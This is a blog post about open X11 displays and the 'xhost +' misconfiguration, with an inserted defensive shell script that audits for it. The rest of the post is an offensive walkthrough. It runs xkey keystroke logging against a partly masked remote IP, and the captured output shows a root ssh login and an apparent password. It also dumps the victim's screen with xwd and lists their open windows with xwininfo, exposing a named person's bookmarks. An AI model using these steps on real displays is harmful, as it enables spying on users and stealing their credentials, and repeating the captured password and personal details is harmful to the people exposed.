Saturday, October 23, 2010

X11 (6000 TCP)

X11 displays are (normally) protected on a network level - that is - there are no usernames and passwords involved. The display is actually a server and it listens on port 6000 (TCP). Control over which clients may connect to the server is handled with the "xhost" command. By default it is set up so that nobody can connect to the display - default deny. As soon as programs need to share the display (exporting an xterm to your display from another host or whatever) the user of the display has to add the IP number or DNS name of the client that wishes to connect by running "xhost +<hostname>". In theory this works nicely, but in the real world people tend to just enter "xhost +", which allows anyone to connect to the display.
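The following is an added example, not part of the original post: a small audit that detects the "xhost +" state described above and whether the display is listening on its TCP port at all. The functions take tool output as text so they run offline; on a live host pass them "$(xhost)" and "$(ss -ltn)". The sample strings are constructed in the shape those tools print.

```shell
# Added example (not from the original post): audit whether a display is in the
# "xhost +" state the post warns about. Feed the functions "$(xhost)" and
# "$(ss -ltn)" on a live host; the samples below are constructed.

SAMPLE_XHOST_OPEN='access control disabled, clients can connect from any host
INET:192.0.2.10'
SAMPLE_XHOST_OK='access control enabled, only authorized clients can connect
SI:localuser:alice
INET:192.0.2.10'
SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0      128    0.0.0.0:6000       0.0.0.0:*
LISTEN 0      128    127.0.0.1:631      0.0.0.0:*'

# classify_xhost TEXT: TEXT is what `xhost` prints with no arguments.
classify_xhost() {
    case "$1" in
        *'access control disabled'*) echo open ;;        # anyone may connect
        *'access control enabled'*)  echo restricted ;;  # only listed entries
        *)                           echo unknown ;;
    esac
}

# count_allowed TEXT: entries on the allow list (non-empty lines after the status line).
count_allowed() {
    printf '%s\n' "$1" | awk 'NR > 1 && NF { n++ } END { print n + 0 }'
}

# x11_tcp_listening TEXT: TEXT is `ss -ltn` output. Succeeds when a display port
# (6000-6009) is bound to a non-loopback address, i.e. reachable over the network.
x11_tcp_listening() {
    printf '%s\n' "$1" | awk '
        $1 == "LISTEN" { n = split($4, a, ":"); p = a[n] + 0
            if (p >= 6000 && p <= 6009 && $4 !~ /^(127\.|\[::1\])/) found = 1 }
        END { exit found ? 0 : 1 }'
}

# audit_display XHOST_TEXT SS_TEXT: one-line verdict combining both checks.
audit_display() {
    state=$(classify_xhost "$1")
    if x11_tcp_listening "$2"; then reach=network; else reach=local-only; fi
    if [ "$state" = open ] && [ "$reach" = network ]; then
        echo "CRITICAL: xhost + in effect and display listening on the network; run: xhost -"
    elif [ "$state" = open ]; then
        echo "WARNING: xhost + in effect; display reachable by local clients only"
    else
        echo "OK: access control $state, $(count_allowed "$1") allowed entries, display $reach"
    fi
}
```

Most current X servers are started with -nolisten tcp, so the port check will usually report local-only; an "xhost +" state still exposes the display to every local account and to anything that reaches a forwarded display.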
A host whose display is open for anyone to connect to is risking a lot, and could easily be compromised. There are a few nice things to do when you find an open X11 display. One of the most common attacks is to capture all the keystrokes that are entered on the victim's host. The program "xkey" (available from www.hack.co.za) does this very neatly:
> xkey 196.37.xxx.14:0.0
..you wait..time passes...and then:
ssh -l root -<>P 196.37.xxx.1
weirdshitometer
It's clear why we are excited about key captures. An open X11 display can also be "copied" - the root window (the main window) can be copied and displayed. Each window has a unique ID - you can specify which window you want to copy, but for a start let us get the root window:
> xwd -display 196.37.xxx.14 -root -silent -out /tmp/screendump
..wait for the transfer...
> xv /tmp/screendump
We are using xv to display the screen - xv can read the xwd format straight off. The screen might include some interesting data - if you get a screensaver - bad luck - use finger to see when someone is active. To get a list of windows that are open on the display you might want to issue the command (the -display argument was missing in the original; it takes the same host:display used above):
> xwininfo -display 196.37.xxx.14:0 -root -all | grep \"
(extract)
0x3000e6f "Netscape: Find": ("findDialog_popup" "Netscape") 378x144+536+227 +536+227
0x1c0000c "FvwmButtons": ("FvwmButtons" "FvwmButtons") 385x68+0+0 +635+4
0x2400005 "xload": ("xload" "XLoad") 106x52+2+2 +637+6
0x2000002 "Desktop": ("FvwmPager" "FvwmModule") 105x64+277+2 +912+6
0x30001ec "Netscape": ("communicator-4_72_bin" "Netscape") 1x1+0+0 +0+0
0x3000172 "Communicator Bookmarks for Roelof Temmingh": ("bookmarks" "Netscape") 872x622+10+10 +10+10
